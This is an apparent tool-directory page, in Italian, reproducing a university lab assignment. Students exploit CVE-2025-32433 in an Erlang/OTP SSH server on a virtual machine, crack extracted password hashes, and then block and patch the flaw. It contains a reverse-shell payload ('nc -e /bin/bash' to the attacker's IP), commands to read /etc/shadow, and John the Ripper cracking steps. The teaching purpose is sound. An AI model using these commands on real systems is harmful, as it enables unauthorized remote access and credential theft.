Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Strumenti/GitHubGitHub/dampedcoast/exploiting-a-vulnerability-using-reverse-shell
Password CrackingAnalisi delle VulnerabilitàExploitSicurezza di ReteCTFPenetration TestingApprendimento e FormazioneLab e Pratica

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →

Informazioni

GitHub
dampedcoast/exploiting-a-vulnerability-using-reverse-shell

Exploiting-a-vulnerability-using-reverse-shell

Vedi Repository
2 mesi faNon ancora revisionato

Questo progetto simula uno scenario reale di attacco e difesa su due macchine virtuali. Sfrutterai una vulnerabilità critica di RCE pre-autenticazione (CVE-2025-32433) in un server SSH Erlang/OTP, craccherai gli hash delle password estratti e poi rafforzerai la macchina vittima con regole firewall e applicazione di patch.

Condividi

Information Security Fundamentals — Progetto Primavera 2026

Punti Totali: 20 | Scadenza: Non sono accettate consegne in ritardo

Panoramica

Questo progetto simula uno scenario reale di attacco e difesa su due macchine virtuali. Sfrutterete una vulnerabilità critica di RCE pre-autenticazione (CVE-2025-32433) in un server SSH Erlang/OTP, decifrerete gli hash delle password estratti e quindi indurirete la macchina vittima con regole firewall e patch.

RuoloOS
AttaccanteKali Linux
VittimaUbuntu/Debian (Erlang/OTP SSH v27.3.2)

File

FileDescrizione
Debian-1.ovaImmagine VM vittima preconfigurata — scaricare separatamente, vedere Risorse (troppo grande per GitHub)

Risorse

  • VM Vittima (Debian-1.ova): Link di download — troppo grande (~3GB) per essere ospitata su GitHub. Scaricarla separatamente e importarla in VirtualBox/VMware come descritto di seguito.
  • Wordlist (rockyou_txt.txt): inclusa in questo repository, utilizzata per la fase di cracking delle password nella Parte 2.

Configurazione

  1. Importare le VM — Caricare Debian-1.ova e la vostra VM Kali Linux in VirtualBox/VMware.
  2. Rete — Impostare entrambe le VM su Host-Only Adapter in modo che possano comunicare privatamente.
  3. IP Vittima — Avviare la vittima ed eseguire ifconfig per trovare il suo IP (tipicamente in 192.168.56.0/24).

Parte 1 — Distribuzione del Server SSH Vulnerabile e Sfruttamento (10 punti)

Ricognizione

root@kitploit:~
nmap -p 2222 -sV -A <victim-IP>

Documentare le porte aperte, le versioni dei servizi e le firme Erlang.

Exploit di CVE-2025-32433 (RCE pre-autenticazione)

Passare temporaneamente Kali a NAT per clonare il repository, poi tornare a Host-Only.

root@kitploit:~
git clone https://github.com/ProDefense/CVE-2025-32433.git
cd CVE-2025-32433
sudo nano CVE-2025-32433.py

Modificare lo script — impostare HOST = "<victim-IP>" e aggiornare il payload:

root@kitploit:~
command='os:cmd("nc -e /bin/bash <Kali-IP> 4444").'

Terminale 1 (Kali) — avviare il listener:

root@kitploit:~
nc -lvnp 4444

Terminale 2 (Kali) — lanciare l'exploit:

root@kitploit:~
python3 CVE-2025-32433.py

Nella reverse shell, eseguire whoami e hostname per confermare l'accesso.


Parte 2 — Post-Exploitation e Cracking delle Password (5 punti)

Estrarre e decifrare l'hash

root@kitploit:~
# On victim (via reverse shell)
cat /etc/shadow | grep testuser > hash.txt

# On Kali
john --wordlist=rockyou_txt.txt hash.txt

Documentare il formato dell'hash (ad es., $6$ = SHA-512), il tempo impiegato e la password in chiaro recuperata.

Trovare la flag

root@kitploit:~
find / -iname "flag.txt" 2>/dev/null
cat /path/to/flag.txt

Parte 3 — Controlli e Mitigazione (5 punti)

Bloccare il vettore d'attacco (iptables)

root@kitploit:~
sudo iptables -A INPUT -p tcp --dport 2222 -j DROP

Rieseguire la scansione Nmap e l'exploit da Kali — documentare che la porta 2222 ora è "Filtered" e che l'exploit fallisce.

Applicare la patch alla vulnerabilità

Documentare i passaggi per aggiornare Erlang/OTP alla versione v27.3.3 o successiva, che contiene la correzione per CVE-2025-32433.


Consegne

  • Report completo con screenshot di: scansione, esecuzione dell'exploit, reverse shell (whoami/hostname), cattura della flag
  • Documentazione firewall prima/dopo (risultati Nmap che mostrano il cambiamento di stato della porta)
  • Riflessione scritta che spiega perché le RCE pre-autenticazione sono significativamente più pericolose degli exploit post-autenticazione

Riferimento CVE

CVE-2025-32433 — Esecuzione remota di codice critica pre-autenticazione nel server SSH Erlang/OTP. Sfruttabile inviando pacchetti SSH malformati prima di qualsiasi scambio di credenziali, consentendo a un attaccante non autenticato l'accesso completo alla shell.

Scarica lo strumento
Project Spring 2026 - Google Docs.pdfIstruzioni complete del progetto con le consegne
rockyou_txt.txtWordlist utilizzata con John the Ripper per decifrare l'hash della password estratto